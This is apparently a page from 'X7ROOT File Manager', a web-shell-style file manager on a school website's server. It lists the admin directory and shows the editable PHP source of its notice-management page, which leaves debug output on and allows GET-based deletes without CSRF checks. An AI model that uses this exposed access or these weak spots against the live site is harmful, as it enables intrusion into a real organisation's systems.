X7ROOT File Manager
Current Path:
/home/u126090504/domains/shreeganeshacademy.in/public_html/admin
home
/
u126090504
/
domains
/
shreeganeshacademy.in
/
public_html
/
admin
/
📁
..
📄
achievers.php
(13.81 KB)
📄
admissions.php
(5.67 KB)
📄
banners.php
(7.18 KB)
📄
change_password.php
(3.54 KB)
📄
contacts.php
(3.83 KB)
📄
dashboard.php
(9.86 KB)
📄
downloads.php
(4.91 KB)
📄
export_franchise.php
(930 B)
📄
faculty.php
(13.27 KB)
📄
forgot_password.php
(6.52 KB)
📄
franchise.php
(7.28 KB)
📄
gallery.php
(3.08 KB)
📄
governing-body-manage.php
(9.12 KB)
📄
grievance-update.php
(1003 B)
📄
grievance-view.php
(5.32 KB)
📄
grievances.php
(5.79 KB)
📁
includes
📄
index.php
(82 B)
📄
login.php
(6.59 KB)
📄
logout.php
(102 B)
📄
manage_albums.php
(2.28 KB)
📄
manage_media.php
(3.02 KB)
📄
manage_photos.php
(5.66 KB)
📄
manage_videos.php
(3.62 KB)
📄
new_password.php
(3.9 KB)
📄
notice.php
(16.36 KB)
📄
notices.php
(8.24 KB)
📄
payments.php
(15.23 KB)
📁
phpmailer
📄
popup.php
(10.68 KB)
📄
reset_password.php
(2.27 KB)
📄
secure_session.php
(1000 B)
📄
settings.php
(5.21 KB)
📄
submit-grievance.php
(4.97 KB)
📄
testimonials.php
(10.25 KB)
📄
update_status.php
(1.29 KB)
📄
upi_settings.php
(1.52 KB)
Editing: notice.php
<?php /******************************* * Admin > Notices (CRUD + File Upload + NEW badge) *******************************/ include 'secure_session.php'; include 'includes/auth.php'; require_once '../config.php'; include 'includes/header.php'; /* ------------------------------------------------- Debug (remove or turn off in production) --------------------------------------------------*/ ini_set('display_errors', 1); ini_set('display_startup_errors', 1); error_reporting(E_ALL); if (function_exists('mysqli_report')) { mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); } /* ------------------------------------------------- Polyfills / helpers --------------------------------------------------*/ if (!function_exists('str_starts_with')) { function str_starts_with($haystack, $needle) { return $needle !== '' && strpos($haystack, $needle) === 0; } } /** * Safely unlink a path only if it's inside /uploads/notices/ */ function safe_unlink_notice_path(?string $publicPath): void { if (!$publicPath) return; $base = realpath(__DIR__ . '/..'); if (!$base) return; // Build absolute path from public path like "/uploads/notices/xyz.pdf" $abs = $base . $publicPath; // Resolve if exists; if not yet present, keep constructed path $real = @realpath($abs); if ($real === false) $real = $abs; // Ensure it's inside the intended directory $allowedRoot = $base . '/uploads/notices/'; if (str_starts_with($real, $allowedRoot) && file_exists($real)) { @unlink($real); } } /* ------------------------------------------------- Auto-migrate table/column (compatible MySQL) --------------------------------------------------*/ $conn->query("CREATE TABLE IF NOT EXISTS notices ( id INT AUTO_INCREMENT PRIMARY KEY, title VARCHAR(255) NOT NULL, url VARCHAR(500) DEFAULT NULL, file_path VARCHAR(500) DEFAULT NULL, starts_on DATE NULL, ends_on DATE NULL, is_active TINYINT(1) NOT NULL DEFAULT 1, created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4"); $needFilePath = true; $res = $conn->query("SHOW COLUMNS FROM notices LIKE 'file_path'"); if ($res && $res->num_rows > 0) { $needFilePath = false; } if ($needFilePath) { // Avoids "ADD COLUMN IF NOT EXISTS" (unsupported on some MySQL versions) $conn->query("ALTER TABLE notices ADD COLUMN file_path VARCHAR(500) NULL AFTER url"); } /* ------------------------------------------------- CSRF --------------------------------------------------*/ if (empty($_SESSION['csrf'])) { $_SESSION['csrf'] = bin2hex(random_bytes(16)); } $CSRF = $_SESSION['csrf']; function check_csrf(){ if (($_POST['csrf'] ?? '') !== ($_SESSION['csrf'] ?? '')) { http_response_code(400); die('Invalid CSRF token.'); } } /* ------------------------------------------------- Upload helper --------------------------------------------------*/ function handle_notice_upload(string $field, ?string $oldPath=null): ?string { if (empty($_FILES[$field]) || $_FILES[$field]['error'] === UPLOAD_ERR_NO_FILE) return null; $f = $_FILES[$field]; if ($f['error'] !== UPLOAD_ERR_OK) return null; $allowed = ['pdf','doc','docx','jpg','jpeg','png']; $max = 10 * 1024 * 1024; // 10 MB if ($f['size'] > $max) return null; $ext = strtolower(pathinfo($f['name'], PATHINFO_EXTENSION)); if (!in_array($ext, $allowed, true)) return null; $base = realpath(__DIR__ . '/..'); $dir = $base . '/uploads/notices'; if (!is_dir($dir)) @mkdir($dir, 0775, true); $safe = preg_replace('/[^a-zA-Z0-9._-]/', '_', pathinfo($f['name'], PATHINFO_FILENAME)); $name = $safe . '_' . bin2hex(random_bytes(4)) . '.' . $ext; $abs = $dir . '/' . $name; $public = '/uploads/notices/' . $name; if (move_uploaded_file($f['tmp_name'], $abs)) { // If replacing an old file, remove it if ($oldPath && str_starts_with($oldPath, '/uploads/notices/')) { safe_unlink_notice_path($oldPath); } return $public; } return null; } /* ------------------------------------------------- Actions --------------------------------------------------*/ $action = $_POST['action'] ?? $_GET['action'] ?? ''; if ($action === 'create') { check_csrf(); $title = trim($_POST['title'] ?? ''); $url = trim($_POST['url'] ?? ''); $starts_on = $_POST['starts_on'] ?: NULL; $ends_on = $_POST['ends_on'] ?: NULL; $is_active = isset($_POST['is_active']) ? 1 : 0; // File nahi di to NULL ki jagah khali string "" store karega $file_path = handle_notice_upload('notice_file', null) ?? ''; if ($title !== '') { $stmt = $conn->prepare("INSERT INTO notices (title, url, file_path, starts_on, ends_on, is_active) VALUES (?,?,?,?,?,?)"); // s s s s s i $stmt->bind_param('sssssi', $title, $url, $file_path, $starts_on, $ends_on, $is_active); $stmt->execute(); $stmt->close(); } header('Location: notice.php?msg=created'); exit; } if ($action === 'update') { check_csrf(); $id = (int)($_POST['id'] ?? 0); $title = trim($_POST['title'] ?? ''); $url = trim($_POST['url'] ?? ''); $starts_on = $_POST['starts_on'] ?: NULL; $ends_on = $_POST['ends_on'] ?: NULL; $is_active = isset($_POST['is_active']) ? 1 : 0; $remove = isset($_POST['remove_file']); if ($id > 0 && $title !== '') { $cur = $conn->query("SELECT file_path FROM notices WHERE id = {$id}")->fetch_assoc(); $old = $cur['file_path'] ?? null; // If user ticked "Remove existing file", delete it if ($remove && $old) { safe_unlink_notice_path($old); $old = null; } // If a new file uploaded, it will replace; pass $old only if not already removed $new = handle_notice_upload('notice_file', ($remove ? null : $old)); // Save final value: uploaded path > keep old > null // Kabhi NULL mat bhejo, warna wahi error aayega $save = ($new !== null) ? $new : ($remove ? '' : ($old ?? '')); $stmt = $conn->prepare("UPDATE notices SET title=?, url=?, file_path=?, starts_on=?, ends_on=?, is_active=? WHERE id=?"); // s s s s s i i $stmt->bind_param('sssssii', $title, $url, $save, $starts_on, $ends_on, $is_active, $id); $stmt->execute(); $stmt->close(); } header('Location: notice.php?msg=updated'); exit; } if ($action === 'toggle' && isset($_GET['id'])) { $id = (int)$_GET['id']; $conn->query("UPDATE notices SET is_active = 1 - is_active WHERE id = {$id}"); header('Location: notice.php?msg=toggled'); exit; } if ($action === 'delete' && isset($_GET['id'])) { $id = (int)$_GET['id']; $cur = $conn->query("SELECT file_path FROM notices WHERE id = {$id}")->fetch_assoc(); if (!empty($cur['file_path'])) { safe_unlink_notice_path($cur['file_path']); } $conn->query("DELETE FROM notices WHERE id = {$id}"); header('Location: notice.php?msg=deleted'); exit; } /* ------------------------------------------------- Fetch --------------------------------------------------*/ $rows = []; if ($res = $conn->query("SELECT * FROM notices ORDER BY created_at DESC")) { while ($r = $res->fetch_assoc()) $rows[] = $r; } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Manage Notices</title> <style> .page-title{color:#0409B0;font-weight:800;letter-spacing:.3px} .card-soft{border:none;border-radius:14px;background:#eef1ff;box-shadow:0 6px 18px rgba(0,0,0,.08)} .table td,.table th{vertical-align:middle} .badge.on{background:#064e3b;color:#34d399;} .badge.off{background:#4b1b1b;color:#fca5a5;} .blink-new{background:#ff0066;color:#fff;border-radius:6px;padding:2px 6px;font-size:11px;font-weight:700;animation:newBlink 1s steps(2,start) infinite;margin-left:8px} @keyframes newBlink{50%{opacity:.15}} </style> </head> <body> <div class="container my-4"> <div class="d-flex align-items-center justify-content-between mb-3"> <h3 class="page-title mb-0"><i class="fas fa-bullhorn mr-2"></i>Manage Notices</h3> <a href="dashboard.php" class="btn btn-light"><i class="fas fa-arrow-left mr-1"></i> Back to Dashboard</a> </div> <?php if(isset($_GET['msg'])): ?> <div class="alert alert-success py-2"><?php echo htmlspecialchars($_GET['msg']); ?></div> <?php endif; ?> <!-- Create --> <div class="card card-soft mb-4"> <div class="card-body"> <h5 class="mb-3"><i class="fas fa-plus mr-2"></i>Add Notice</h5> <form method="post" class="row" enctype="multipart/form-data"> <input type="hidden" name="action" value="create"> <input type="hidden" name="csrf" value="<?php echo htmlspecialchars($CSRF); ?>"> <div class="form-group col-md-6"> <label>Title <span class="text-danger">*</span></label> <input class="form-control" name="title" required placeholder="e.g., Admission open for 2025-26"> </div> <div class="form-group col-md-6"> <label>Optional URL</label> <input class="form-control" name="url" type="url" placeholder="https://example.com/details"> </div> <div class="form-group col-md-6"> <label>Attach File (PDF/Doc/Image)</label> <input class="form-control" type="file" name="notice_file" accept=".pdf,.doc,.docx,.jpg,.jpeg,.png"> <small class="text-muted">Max 10 MB. If both URL & file are given, file link is used.</small> </div> <div class="form-group col-md-3"> <label>Starts On</label> <input class="form-control" name="starts_on" type="date"> </div> <div class="form-group col-md-3"> <label>Ends On</label> <input class="form-control" name="ends_on" type="date"> </div> <div class="form-group col-md-3 d-flex align-items-center"> <div class="custom-control custom-checkbox mt-4"> <input type="checkbox" class="custom-control-input" id="createActive" name="is_active" checked> <label class="custom-control-label" for="createActive">Active</label> </div> </div> <div class="form-group col-md-12"> <button class="btn btn-primary" style="background:#0409B0;border-color:#0409B0;">Save Notice</button> </div> </form> </div> </div> <!-- List --> <div class="card card-soft"> <div class="card-body"> <h5 class="mb-3"><i class="fas fa-list mr-2"></i>All Notices</h5> <div class="table-responsive"> <table class="table table-sm"> <thead class="thead-light"> <tr> <th style="width:60px">ID</th> <th>Title</th> <th style="width:120px">Starts</th> <th style="width:120px">Ends</th> <th style="width:100px">Status</th> <th style="width:220px">Actions</th> </tr> </thead> <tbody> <?php if (empty($rows)): ?> <tr><td colspan="6" class="text-muted">No notices yet.</td></tr> <?php else: foreach ($rows as $r): ?> <?php // Determine "new" by starts_on (if present) else created_at $publish = !empty($r['starts_on']) ? $r['starts_on'] : ($r['created_at'] ?? null); $is_new = $publish ? (strtotime($publish) >= strtotime('-15 days')) : false; $id = (int)$r['id']; $title = htmlspecialchars($r['title'], ENT_QUOTES, 'UTF-8'); $starts = htmlspecialchars($r['starts_on'] ?? ''); $ends = htmlspecialchars($r['ends_on'] ?? ''); $isActive = !empty($r['is_active']); $link = !empty($r['file_path']) ? $r['file_path'] : ($r['url'] ?? ''); ?> <tr> <td><?php echo $id; ?></td> <td> <div class="font-weight-bold"> <?php echo $title; ?> <?php if ($is_new): ?><span class="blink-new">NEW</span><?php endif; ?> </div> <?php if ($link): ?> <div> <a target="_blank" href="<?php echo htmlspecialchars($link, ENT_QUOTES, 'UTF-8'); ?>"> <?php echo !empty($r['file_path']) ? 'Download file' : 'Open link'; ?> </a> </div> <?php endif; ?> </td> <td><?php echo $starts; ?></td> <td><?php echo $ends; ?></td> <td><?php echo $isActive ? '<span class="badge on">Active</span>' : '<span class="badge off">Inactive</span>'; ?></td> <td> <button class="btn btn-sm btn-outline-secondary mr-1" onclick='editNotice(<?php echo $id; ?>, <?php echo json_encode($r, JSON_HEX_TAG|JSON_HEX_APOS|JSON_HEX_QUOT|JSON_HEX_AMP); ?>)'> <i class="fas fa-edit"></i> Edit </button> <a class="btn btn-sm btn-outline-primary mr-1" href="?action=toggle&id=<?php echo $id; ?>"> <i class="fas fa-toggle-on"></i> Toggle </a> <a class="btn btn-sm btn-outline-danger" onclick="return confirm('Delete this notice?');" href="?action=delete&id=<?php echo $id; ?>"> <i class="fas fa-trash"></i> Delete </a> </td> </tr> <?php endforeach; endif; ?> </tbody> </table> </div> </div> </div> </div> <!-- Edit Modal --> <div class="modal fade" id="editModal" tabindex="-1" role="dialog" aria-labelledby="editTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered" role="document"> <form class="modal-content" method="post" enctype="multipart/form-data"> <input type="hidden" name="action" value="update"> <input type="hidden" name="id" id="edit_id"> <input type="hidden" name="csrf" value="<?php echo htmlspecialchars($CSRF); ?>"> <div class="modal-header"> <h5 class="modal-title" id="editTitle"><i class="fas fa-edit mr-1"></i> Edit Notice</h5> <button type="button" class="close" data-dismiss="modal"><span>×</span></button> </div> <div class="modal-body"> <div class="form-group"> <label>Title *</label> <input class="form-control" name="title" id="edit_title" required> </div> <div class="form-group"> <label>URL</label> <input class="form-control" name="url" id="edit_url" type="url"> </div> <div class="form-row"> <div class="form-group col-6"> <label>Starts On</label> <input class="form-control" name="starts_on" id="edit_starts" type="date"> </div> <div class="form-group col-6"> <label>Ends On</label> <input class="form-control" name="ends_on" id="edit_ends" type="date"> </div> </div> <div class="form-group"> <label>Replace File</label> <input class="form-control" type="file" name="notice_file" accept=".pdf,.doc,.docx,.jpg,.jpeg,.png"> <div class="custom-control custom-checkbox mt-2"> <input type="checkbox" class="custom-control-input" id="remove_file" name="remove_file"> <label class="custom-control-label" for="remove_file">Remove existing file</label> </div> </div> <div class="custom-control custom-checkbox"> <input type="checkbox" class="custom-control-input" id="edit_active" name="is_active"> <label class="custom-control-label" for="edit_active">Active</label> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" style="background:#0409B0;border-color:#0409B0;">Save Changes</button> </div> </form> </div> </div> <script> function editNotice(id, data){ document.getElementById('edit_id').value = id; document.getElementById('edit_title').value = data.title || ''; document.getElementById('edit_url').value = data.url || ''; document.getElementById('edit_starts').value = data.starts_on || ''; document.getElementById('edit_ends').value = data.ends_on || ''; document.getElementById('edit_active').checked = (parseInt(data.is_active, 10) === 1); $('#editModal').modal('show'); } </script> <?php include 'includes/footer.php'; ?>
Upload File
Create Folder